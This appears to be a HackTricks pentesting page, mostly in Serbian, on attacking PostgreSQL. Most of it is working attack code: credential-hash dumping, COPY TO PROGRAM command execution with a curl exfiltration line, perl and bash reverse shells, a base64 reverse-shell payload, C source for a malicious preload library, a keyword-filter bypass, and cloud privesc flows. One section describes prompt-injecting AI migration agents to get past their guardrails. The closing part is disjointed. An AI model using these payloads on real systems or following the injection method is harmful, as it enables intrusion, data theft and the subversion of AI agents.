5432,5433 - Pentesting Postgresql

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Osnovne informacije

PostgreSQL se opisuje kao objektno-relacioni sistem za upravljanje bazama podataka koji je otvorenog koda. Ovaj sistem ne samo da koristi SQL jezik, već ga i proširuje dodatnim funkcijama. Njegove sposobnosti omogućavaju rukovanje širokim spektrom tipova podataka i operacija, što ga čini svestranim izborom za developere i organizacije.

Podrazumevani port: 5432, i ako je ovaj port već zauzet izgleda da će postgresql koristiti sledeći port (verovatno 5433) koji nije u upotrebi.

PORT     STATE SERVICE
5432/tcp open  pgsql

Povezivanje & Basic Enum

psql -U <myuser> # Open psql console with user
psql -h <host> -U <username> -d <database> # Remote connection
psql -h <host> -p <port> -U <username> -W <password> <database> # Remote connection

psql -h localhost -d <database_name> -U <User> #Password will be prompted
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
SELECT user;

# Get current database
SELECT current_catalog;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;
SELECT * FROM pg_extension;

# Get history of commands executed
\s

Warning

Ako pri pokretanju \list pronađete bazu podataka pod nazivom rdsadmin, znajte da ste unutar AWS postgresql database.

Za više informacija o tome kako zloupotrebiti PostgreSQL bazu podataka pogledajte:

PostgreSQL injection

Automatska enumeracija

msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection

Brute force

Port scanning

Prema this research, kada pokušaj konekcije ne uspe, dblink baca izuzetak sqlclient_unable_to_establish_sqlconnection koji sadrži objašnjenje greške. Primeri ovih detalja navedeni su u nastavku.

SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
user=name
password=secret
dbname=abc
connect_timeout=10');

• Host nije dostupan

DETAIL: could not connect to server: No route to host Is the server running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

• Port je zatvoren

DETAIL:  could not connect to server: Connection refused Is  the  server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

• Port je otvoren

DETAIL:  server closed the connection unexpectedly This  probably  means
the server terminated abnormally before or while processing the request

ili

DETAIL:  FATAL:  password authentication failed for user "name"

• Port je otvoren ili filtriran

DETAIL:  could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?

In PL/pgSQL functions, it is currently not possible to obtain exception details. However, if you have direct access to the PostgreSQL server, you can retrieve the necessary information. If extracting usernames and passwords from the system tables is not feasible, you may consider utilizing the wordlist attack method discussed in the preceding section, as it could potentially yield positive results.

Enumeracija privilegija

Uloge

Zanimljive grupe

• Ako ste član pg_execute_server_program, možete izvršavati programe
• Ako ste član pg_read_server_files, možete čitati fajlove
• Ako ste član pg_write_server_files, možete pisati fajlove

Tip

Imajte na umu da su u Postgresu korisnik, grupa i uloga isti. Zavisi samo od kako ih koristite i da li im dozvoljavate prijavu.

# Get users roles
\du

#Get users roles & groups
# r.rolpassword
# r.rolconfig,
SELECT
r.rolname,
r.rolsuper,
r.rolinherit,
r.rolcreaterole,
r.rolcreatedb,
r.rolcanlogin,
r.rolbypassrls,
r.rolconnlimit,
r.rolvaliduntil,
r.oid,
ARRAY(SELECT b.rolname
FROM pg_catalog.pg_auth_members m
JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;

# Check if current user is superiser
## If response is "on" then true, if "off" then false
SELECT current_setting('is_superuser');

# Try to grant access to groups
## For doing this you need to be admin on the role, superadmin or have CREATEROLE role (see next section)
GRANT pg_execute_server_program TO "username";
GRANT pg_read_server_files TO "username";
GRANT pg_write_server_files TO "username";
## You will probably get this error:
## Cannot GRANT on the "pg_write_server_files" role without being a member of the role.

# Create new role (user) as member of a role (group)
CREATE ROLE u LOGIN PASSWORD 'lriohfugwebfdwrr' IN GROUP pg_read_server_files;
## Common error
## Cannot GRANT on the "pg_read_server_files" role without being a member of the role.

Tabele

# Get owners of tables
select schemaname,tablename,tableowner from pg_tables;
## Get tables where user is owner
select schemaname,tablename,tableowner from pg_tables WHERE tableowner = 'postgres';

# Get your permissions over tables
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants;

#Check users privileges over a table (pg_shadow on this example)
## If nothing, you don't have any permission
SELECT grantee,table_schema,table_name,privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow';

Funkcije

# Interesting functions are inside pg_catalog
\df * #Get all
\df *pg_ls* #Get by substring
\df+ pg_read_binary_file #Check who has access

# Get all functions of a schema
\df pg_catalog.*

# Get all functions of a schema (pg_catalog in this case)
SELECT routines.routine_name, parameters.data_type, parameters.ordinal_position
FROM information_schema.routines
LEFT JOIN information_schema.parameters ON routines.specific_name=parameters.specific_name
WHERE routines.specific_schema='pg_catalog'
ORDER BY routines.routine_name, parameters.ordinal_position;

# Another aparent option
SELECT * FROM pg_proc;

Radnje nad fajl-sistemom

Čitanje direktorijuma i fajlova

Iz ovog commit članovi definisane grupe DEFAULT_ROLE_READ_SERVER_FILES (koja se zove pg_read_server_files) i superkorisnici mogu koristiti metodu COPY na bilo kojoj putanji (pogledajte convert_and_check_filename u genfile.c):

# Read file
CREATE TABLE demo(t text);
COPY demo from '/etc/passwd';
SELECT * FROM demo;

Warning

Zapamti da ako nisi superuser, ali imaš dozvole CREATEROLE, možeš da sebe učiniš članom te grupe:

GRANT pg_read_server_files TO username;

More info.

Postoje druge postgres funkcije koje se mogu koristiti za čitanje fajla ili navođenje sadržaja direktorijuma. Samo superusers i korisnici sa eksplicitnim dozvolama mogu da ih koriste:

# Before executing these function go to the postgres DB (not in the template1)
\c postgres
## If you don't do this, you might get "permission denied" error even if you have permission

select * from pg_ls_dir('/tmp');
select * from pg_read_file('/etc/passwd', 0, 1000000);
select * from pg_read_binary_file('/etc/passwd');

# Check who has permissions
\df+ pg_ls_dir
\df+ pg_read_file
\df+ pg_read_binary_file

# Try to grant permissions
GRANT EXECUTE ON function pg_catalog.pg_ls_dir(text) TO username;
# By default you can only access files in the datadirectory
SHOW data_directory;
# But if you are a member of the group pg_read_server_files
# You can access any file, anywhere
GRANT pg_read_server_files TO username;
# Check CREATEROLE privilege escalation

Možete pronaći više funkcija na https://www.postgresql.org/docs/current/functions-admin.html

Jednostavno pisanje fajlova

Samo super users i članovi pg_write_server_files mogu koristiti copy za pisanje fajlova.

copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';

Warning

Zapamtite da ako niste super korisnik ali imate CREATEROLE permisije možete dodati sebe u tu grupu:

GRANT pg_write_server_files TO username;

More info.

Zapamtite da COPY ne može da obrađuje newline karaktere, zato čak i ako koristite base64 payload ymoraćete poslati jednolinijski sadržaj.
Veoma važno ograničenje ove tehnike je da copy cannot be used to write binary files as it modify some binary values.

Binary files upload

Međutim, postoje druge tehnike za otpremanje velikih binarnih fajlova:

Big Binary Files Upload (PostgreSQL)

Ažuriranje PostgreSQL table data putem lokalnog upisa fajla

Ako imate potrebna prava za čitanje i pisanje fajlova PostgreSQL servera, možete ažurirati bilo koju tabelu na serveru prepisivanjem pripadajućeg filenode-a u the PostgreSQL data directory. More on this technique here.

Potrebni koraci:

1. Nabavite direktorijum podataka PostgreSQL-a

SELECT setting FROM pg_settings WHERE name = 'data_directory';

Note: Ako ne možete da dobijete trenutnu putanju direktorijuma podataka iz postavki, možete upitati glavnu verziju PostgreSQL-a preko SELECT version() upita i pokušati da brute-force-ujete putanju. Uobičajene putanje direktorijuma podataka na Unix instalacijama PostgreSQL-a su /var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/. Uobičajeno ime klastera je main.

2. Dohvatite relativnu putanju do filenode-a povezanog sa ciljnom tabelom

SELECT pg_relation_filepath('{TABLE_NAME}')

Ovaj upit bi trebalo da vrati nešto poput base/3/1337. Puna putanja na disku biće $DATA_DIRECTORY/base/3/1337, npr. /var/lib/postgresql/13/main/base/3/1337.

3. Preuzmite filenode pomoću lo_* funkcija

SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)

4. Dobijte tip podataka povezan sa ciljnom tabelom

SELECT
STRING_AGG(
CONCAT_WS(
',',
attname,
typname,
attlen,
attalign
),
';'
)
FROM pg_attribute
JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';

5. Koristite PostgreSQL Filenode Editor da [edit the filenode]; postavite sve rol* boolean zastavice na 1 za puna prava.

python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}

6. Ponovo otpremite izmenjeni filenode preko lo_* funkcija i prepišite originalni fajl na disku

SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')

7. (Optionally) Očistite in-memory keš tabele izvršavanjem zahtevnog SQL upita

SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)

8. Sada biste trebali videti ažurirane vrednosti tabele u PostgreSQL-u.

Takođe možete postati superadmin uređivanjem tabele pg_authid. See the following section.

RCE

RCE to program

Since version 9.3, only super users and member of the group pg_execute_server_program can use copy for RCE (example with exfiltration:

'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -

Primer za exec:

#PoC
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

#Reverse shell
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';

Warning

Zapamti da ako nisi super user ali imaš CREATEROLE dozvole, možeš učiniti sebe članom te grupe:

GRANT pg_execute_server_program TO username;

More info.

Ili koristi modul multi/postgres/postgres_copy_from_program_cmd_exec iz metasploit.
Više informacija o ovoj ranjivosti here. Iako je prijavljeno kao CVE-2019-9193, Postges je izjavio da je ovo feature and will not be fixed.

Zaobilaženje filtera ključnih reči/WAF da se dođe do COPY PROGRAM

U SQLi kontekstima sa stacked queries, WAF može ukloniti ili blokirati literalnu ključnu reč COPY. Možeš dinamički sastaviti izraz i izvršiti ga unutar PL/pgSQL DO bloka. Na primer, izgradi vodeće C pomoću CHR(67) da zaobiđe naivne filtere i EXECUTE sastavljenu komandu:

DO $$
DECLARE cmd text;
BEGIN
cmd := CHR(67) || 'OPY (SELECT '''') TO PROGRAM ''bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"''';
EXECUTE cmd;
END $$;

This pattern avoids static keyword filtering and still achieves OS command execution via COPY ... PROGRAM. It is especially useful when the application echoes SQL errors and allows stacked queries.

RCE with PostgreSQL Languages

RCE with PostgreSQL Languages

RCE with PostgreSQL extensions

Once you have learned from the previous post how to upload binary files you could try obtain RCE uploading a postgresql extension and loading it.

RCE with PostgreSQL Extensions

PostgreSQL configuration file RCE

Tip

The following RCE vectors are especially useful in constrained SQLi contexts, as all steps can be performed through nested SELECT statements

The configuration file of PostgreSQL is writable by the postgres user, which is the one running the database, so as superuser, you can write files in the filesystem, and therefore you can overwrite this file.

RCE with ssl_passphrase_command

More information about this technique here.

The configuration file have some interesting attributes that can lead to RCE:

• ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key' Path to the private key of the database
• ssl_passphrase_command = '' If the private file is protected by password (encrypted) postgresql will execute the command indicated in this attribute.
• ssl_passphrase_command_supports_reload = off If this attribute is on the command executed if the key is protected by password will be executed when pg_reload_conf() is executed.

Then, an attacker will need to:

1. Dump private key from the server
2. Encrypt downloaded private key:
3. rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key
4. Overwrite
5. Dump the current postgresql configuration
6. Overwrite the configuration with the mentioned attributes configuration:
7. ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'
8. ssl_passphrase_command_supports_reload = on
9. Execute pg_reload_conf()

While testing this I noticed that this will only work if the private key file has privileges 640, it’s owned by root and by the group ssl-cert or postgres (so the postgres user can read it), and is placed in /var/lib/postgresql/12/main.

RCE with archive_command

More information about this config and about WAL here.

Another attribute in the configuration file that is exploitable is archive_command.

For this to work, the archive_mode setting has to be 'on' or 'always'. If that is true, then we could overwrite the command in archive_command and force it to execute via the WAL (write-ahead logging) operations.

The general steps are:

1. Check whether archive mode is enabled: SELECT current_setting('archive_mode')
2. Overwrite archive_command with the payload. For eg, a reverse shell: archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'
3. Reload the config: SELECT pg_reload_conf()
4. Force the WAL operation to run, which will call the archive command: SELECT pg_switch_wal() or SELECT pg_switch_xlog() for some Postgres versions

Editing postgresql.conf via Large Objects (SQLi-friendly)

When multi-line writes are needed (e.g., to set multiple GUCs), use PostgreSQL Large Objects to read and overwrite the config entirely from SQL. This approach is ideal in SQLi contexts where COPY cannot handle newlines or binary-safe writes.

Example (adjust the major version and path if needed, e.g. version 15 on Debian):

-- 1) Import the current configuration and note the returned OID (example OID: 114575)
SELECT lo_import('/etc/postgresql/15/main/postgresql.conf');

-- 2) Read it back as text to verify
SELECT encode(lo_get(114575), 'escape');

-- 3) Prepare a minimal config snippet locally that forces execution via WAL
--    and base64-encode its contents, for example:
--    archive_mode = 'always'\n
--    archive_command = 'bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"'\n
--    archive_timeout = 1\n
--    Then write the new contents into a new Large Object and export it over the original file
SELECT lo_from_bytea(223, decode('<BASE64_POSTGRESQL_CONF>', 'base64'));
SELECT lo_export(223, '/etc/postgresql/15/main/postgresql.conf');

-- 4) Reload the configuration and optionally trigger a WAL switch
SELECT pg_reload_conf();
-- Optional explicit trigger if needed
SELECT pg_switch_wal();  -- or pg_switch_xlog() on older versions

Ovo omogućava pouzdano izvršavanje OS komandi preko archive_command kao korisnik postgres, pod uslovom da je omogućen archive_mode. U praksi, postavljanje niske vrednosti archive_timeout može izazvati brzo pokretanje bez potrebe za eksplicitnim WAL switch-om.

RCE with preload libraries

More information about this technique here.

Ovaj napad iskorišćava sledeće konfiguracione promenljive:

• session_preload_libraries – biblioteke koje će PostgreSQL server učitati pri klijentskoj konekciji.
• dynamic_library_path – lista direktorijuma u kojima će PostgreSQL server tražiti biblioteke.

Možemo postaviti vrednost dynamic_library_path na direktorijum koji je zapisiv od strane korisnika postgres koji pokreće bazu, npr. direktorijum /tmp/, i tamo otpremiti maliciozni .so objekat. Zatim ćemo primorati PostgreSQL server da učita naš novootpremljeni biblioteku uključivanjem njegovog imena u promenljivu session_preload_libraries.

Koraci napada su:

1. Preuzmite originalni postgresql.conf
2. Uključite direktorijum /tmp/ u vrednost dynamic_library_path, npr. dynamic_library_path = '/tmp:$libdir'
3. Uključite ime maliciozne biblioteke u vrednost session_preload_libraries, npr. session_preload_libraries = 'payload.so'
4. Proverite glavnu verziju PostgreSQL-a pomoću upita SELECT version()
5. Kompajlirajte maliciozni kod biblioteke koristeći odgovarajući PostgreSQL dev paket. Primer koda:

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "postgres.h"
#include "fmgr.h"

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

void _init() {
/*
code taken from https://www.revshells.com/
*/

int port = REVSHELL_PORT;
struct sockaddr_in revsockaddr;

int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("REVSHELL_IP");

connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);

char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}

Kompajliranje koda:

gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c

6. Otpremite maliciozni postgresql.conf kreiran u koracima 2-3 i prepišite originalni fajl
7. Otpremite payload.so iz koraka 5 u direktorijum /tmp
8. Ponovo učitajte konfiguraciju servera restartovanjem servera ili pozivanjem upita SELECT pg_reload_conf()
9. Pri sledećem DB konektovanju dobićete reverse shell konekciju.

Postgres Privesc

CREATEROLE Privesc

Grant

According to the docs: Uloge koje imaju privilegiju CREATEROLE mogu dodeliti ili opozvati članstvo u bilo kojoj roli koja nije superuser.

Dakle, ako imate dozvolu CREATEROLE, možete sebi dodeliti pristup drugim rolama (koje nisu superuser) koje vam mogu omogućiti čitanje i pisanje fajlova i izvršavanje komandi:

# Access to execute commands
GRANT pg_execute_server_program TO username;
# Access to read files
GRANT pg_read_server_files TO username;
# Access to write files
GRANT pg_write_server_files TO username;

Modify Password

Korisnici sa ovom ulogom takođe mogu promeniti lozinke drugih non-superusers:

#Change password
ALTER USER user_name WITH PASSWORD 'new_password';

Privesc to SUPERUSER

Često se dešava da lokalni korisnici mogu da se prijave u PostgreSQL bez unošenja lozinke. Dakle, kada ste stekli dozvole za izvršavanje koda možete zloupotrebiti te dozvole da sebi dodelite ulogu SUPERUSER:

COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';

Tip

Ovo je obično moguće zbog sledećih linija u fajlu pg_hba.conf:

# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

ALTER TABLE privesc

U this writeup je objašnjeno kako je bilo moguće izvesti privesc u Postgres GCP zloupotrebom ALTER TABLE privilegije koja je dodeljena korisniku.

Kada pokušate da napravite drugog korisnika vlasnikom tabele trebalo bi da dobijete grešku koja to onemogućava, ali izgleda da je GCP dao tu opciju korisniku ‘postgres’ koji nije superuser u GCP:

U kombinaciji sa činjenicom da kada se komande INSERT/UPDATE/ANALYZE izvrše nad tabelom koja ima funkciju indeksa, ta funkcija se poziva kao deo komande sa dozvolama vlasnika tabele. Moguće je kreirati indeks sa funkcijom i dodeliti vlasnička prava superuser-u nad tom tabelom, a zatim pokrenuti ANALYZE nad tom tabelom sa zlonamernom funkcijom koja će moći da izvršava komande jer koristi privilegije vlasnika.

GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);

Eksploatacija

1. Počnite kreiranjem nove tabele.
2. Ubacite neki irelevantan sadržaj u tabelu kako biste obezbedili podatke za index function.
3. Razvijte zlonamernu index function koja sadrži code execution payload, omogućavajući izvršavanje neautorizovanih komandi.
4. Promenite vlasnika tabele korišćenjem ALTER na “cloudsqladmin”, koji je GCP-ov superuser namenjen isključivo za upravljanje i održavanje baze u Cloud SQL.
5. Izvršite ANALYZE nad tabelom. Ova radnja prisiljava PostgreSQL engine da se prebaci u korisnički kontekst vlasnika tabele, “cloudsqladmin”. Posledično, zlonamerna index function se poziva sa privilegijama “cloudsqladmin”, čime je omogućeno izvršenje ranije neautorizovanog shell command.

In PostgreSQL, this flow looks something like this:

CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);

INSERT INTO temp_table VALUES ('dummy content');

/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql IMMUTABLE AS 'select ''nothing'';';

CREATE INDEX index_malicious ON public.temp_table (suid_function(data));

ALTER TABLE temp_table OWNER TO cloudsqladmin;

/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */
CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text
LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';';

ANALYZE public.temp_table;

Zatim će tabela shell_commands_results sadržati izlaz izvršenog koda:

uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)

Lokalna prijava

Neke pogrešno konfigurisane postgresql instance mogu dozvoliti prijavu bilo kog lokalnog korisnika; moguće je prijaviti se lokalno sa 127.0.0.1 koristeći dblink funkciju:

\du * # Get Users
\l    # Get databases
SELECT * FROM dblink('host=127.0.0.1
port=5432
user=someuser
password=supersecret
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);

Warning

Imajte na umu da, da bi prethodni upit radio, funkcija dblink mora postojati. Ako ne postoji, možete pokušati da je kreirate sa

CREATE EXTENSION dblink;

Ako imate password korisnika sa višim privilegijama, ali tom user-u nije dozvoljeno da se loginuje sa external IP-a, možete koristiti sledeću funkciju da izvršavate upite kao taj user:

SELECT * FROM dblink('host=127.0.0.1
user=someuser
dbname=somedb',
'SELECT usename,passwd from pg_shadow')
RETURNS (result TEXT);

Moguće je proveriti da li ova funkcija postoji pomoću:

SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;

Funkcija definisana po meri sa SECURITY DEFINER

In this writeup, pentesters su uspeli da privesc unutar postgres instance koju je obezbedio IBM, zato što su pronašli ovu funkciju sa SECURITY DEFINER zastavicom:

CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
RETURNS text
LANGUAGE 'plpgsql'
    VOLATILE SECURITY DEFINER
    PARALLEL UNSAFE
COST 100

AS $BODY$
DECLARE
persist_dblink_extension boolean;
BEGIN
persist_dblink_extension := create_dblink_extension();
PERFORM dblink_connect(format('dbname=%s', db_name));
PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
PERFORM dblink_disconnect();
…

As explained in the docs funkcija sa SECURITY DEFINER se izvršava sa privilegijama korisnika koji je poseduje. Stoga, ako je funkcija ranjiva na SQL Injection ili vrši neke privilegovane akcije sa parametrima koje kontroliše napadač, može se iskoristiti da escalate privileges inside postgres.

U liniji 4 prethodnog koda možete videti da funkcija ima SECURITY DEFINER zastavicu.

CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);

A zatim izvršite komande:

Pass Burteforce with PL/pgSQL

PL/pgSQL je puni programski jezik koji pruža veću proceduralnu kontrolu u odnosu na SQL. Omogućava upotrebu petlji i drugih kontrolnih struktura za unapređenje logike programa. Pored toga, SQL naredbe i trigeri mogu pozivati funkcije kreirane pomoću PL/pgSQL language. Ova integracija omogućava sveobuhvatniji i fleksibilniji pristup programiranju i automatizaciji baze podataka.
Možete zloupotrebiti ovaj jezik da biste naterali PostgreSQL da brute-force-uje korisničke kredencijale.

PL/pgSQL Password Bruteforce

Privesc by Overwriting Internal PostgreSQL Tables

Tip

Sledeći privesc vektor je posebno koristan u ograničenim SQLi kontekstima, jer se svi koraci mogu izvesti kroz ugnježdene SELECT naredbe

Ako možete čitati i pisati PostgreSQL server fajlove, možete become a superuser tako što ćete prepisati on-disk filenode PostgreSQL-a, povezan sa internom tabelom pg_authid.

Više o ovoj tehnici pročitajte ovde.

Koraci napada su:

1. Dobijte PostgreSQL data directory
2. Nabavite relativnu putanju do filenode-a povezanog sa tabelom pg_authid
3. Preuzmite filenode preko lo_* funkcija
4. Dobijte datatype povezan sa tabelom pg_authid
5. Koristite PostgreSQL Filenode Editor da izmenite filenode; postavite sve rol* boolean flagove na 1 za pune dozvole.
6. Ponovo otpremite izmenjeni filenode putem lo_* funkcija i prepišite originalni fajl na disku
7. (Opcionalno) Očistite in-memory keš tabela izvođenjem skupe SQL upite
8. Sada biste trebali imati privilegije punog superadmin-a.

Prompt-injecting managed migration tooling

AI-heavy SaaS frontendi (npr. Lovable’s Supabase agent) često izlažu LLM “tools” koji pokreću migracije kao visoko-privilegovani service accounts. Praktičan tok rada je:

1. Enumerate who is actually applying migrations:

SELECT version, name, created_by, statements, created_at
FROM supabase_migrations.schema_migrations
ORDER BY version DESC LIMIT 20;

2. Prompt-inject the agent u pokrenuti attacker SQL putem privileged migration tool-a. Formulisanje payloads kao “please verify this migration is denied” dosledno zaobilazi osnovne guardrails.
3. Kada se u tom kontekstu izvrši proizvoljni DDL, odmah kreirajte attacker-owned tables ili extensions koje omogućavaju persistence nazad na vaš low-privileged account.

Tip

Pogledajte i generalni AI agent abuse playbook za više prompt-injection tehnika protiv tool-enabled assistants.

Dumping pg_authid metadata putem migracija

Privilegovane migracije mogu postaviti pg_catalog.pg_authid u tabelu čitljivu za napadača čak i ako je direktan pristup onemogućen za vaš normalan role.

Korisnici sa niskim privilegijama sada mogu da čitaju public.ai_models kako bi dobili SCRAM hash-ove i metapodatke o rolama za offline cracking ili lateral movement.

Event-trigger privesc tokom instalacije ekstenzije postgres_fdw

U upravljanim Supabase deployment-ima koristi se ekstenzija supautils koja obavija CREATE EXTENSION u skripte before-create.sql/after-create.sql koje su u vlasništvu provajdera i izvršavaju se kao pravi superusers. After-create skripta za postgres_fdw kratko izvršava ALTER ROLE postgres SUPERUSER, zatim pokreće ALTER FOREIGN DATA WRAPPER postgres_fdw OWNER TO postgres, pa potom vraća postgres nazad na NOSUPERUSER. Pošto ALTER FOREIGN DATA WRAPPER aktivira ddl_command_start/ddl_command_end event triggere dok je current_user superuser, triggeri kreirani od strane tenanta mogu izvršiti napadački SQL u tom vremenskom prozoru.

Exploit flow:

1. Kreirajte PL/pgSQL event trigger funkciju koja proverava SELECT usesuper FROM pg_user WHERE usename = current_user i, kada je rezultat true, obezbeđuje backdoor rolu (npr. CREATE ROLE priv_esc WITH SUPERUSER LOGIN PASSWORD 'temp123').
2. Registrujte funkciju na oba ddl_command_start i ddl_command_end.
3. DROP EXTENSION IF EXISTS postgres_fdw CASCADE; pa CREATE EXTENSION postgres_fdw; da ponovo pokrenete Supabase-ov after-create hook.
4. Kada hook podigne privilegije postgres, trigger se izvršava, kreira persistentnu SUPERUSER rolu i dodeljuje je nazad postgres radi lakog pristupa preko SET ROLE.

</details>

Supabase-ov pokušaj da preskoči unsafe triggers proverava samo vlasništvo, pa osigurajte da je owner trigger funkcije vaša low-privileged role, ali payload se izvršava samo kada hook preokrene `current_user` u SUPERUSER. Pošto se trigger ponovo izvršava na budućem DDL, on služi i kao self-healing persistence backdoor kad god provider kratko podigne tenant roles.

### Pretvaranje privremenog SUPERUSER pristupa u kompromitovanje hosta

Nakon što se `SET ROLE priv_esc;` uspešno izvrši, ponovo pokrenite ranije blokirane primitives:
```sql
INSERT INTO public.ai_models(model_name, config)
VALUES ('hostname', to_jsonb(pg_read_file('/etc/hostname', 0, 100)));
COPY (SELECT '') TO PROGRAM 'curl https://rce.ee/rev.sh | bash';

find / -perm -4000 -type f 2>/dev/null

msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload

log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
logging_collector = on
sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/

sqlite3 pgadmin4.db ".schema"
sqlite3 pgadmin4.db "select * from user;"
sqlite3 pgadmin4.db "select * from server;"
string pgadmin4.db